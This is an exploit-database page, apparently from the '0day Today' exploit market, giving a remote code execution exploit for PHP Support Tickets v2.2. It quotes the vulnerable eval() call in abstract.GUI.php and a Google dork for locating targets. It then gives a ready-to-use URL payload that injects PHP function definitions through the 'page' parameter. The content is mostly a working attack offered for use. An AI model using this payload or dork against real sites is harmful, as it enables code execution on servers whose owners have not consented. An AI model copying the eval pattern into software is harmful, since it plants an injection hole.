[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP Support Tickets v2.2 Code Exec

Author
brain[pillow]
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16925
Category
web applications
Date add
11-09-2011
Platform
php
# Exploit Title: PHP Support Tickets v2.2 Code Exec
# Google Dork: "PHP Support Tickets v2.2"
# Date: 26.09.2010
# Author: brain[pillow]
# Software Link: http://www.phpsupporttickets.com/
# Version: 2.2
 
====================================================================
# Vuln. code:
 
/classes/GUI/abstract.GUI.php
 
    public function getPageName() {
        return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';');
    }
 
====================================================================
# Exploit:
 
/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}



#  0day.today [2024-11-15]  #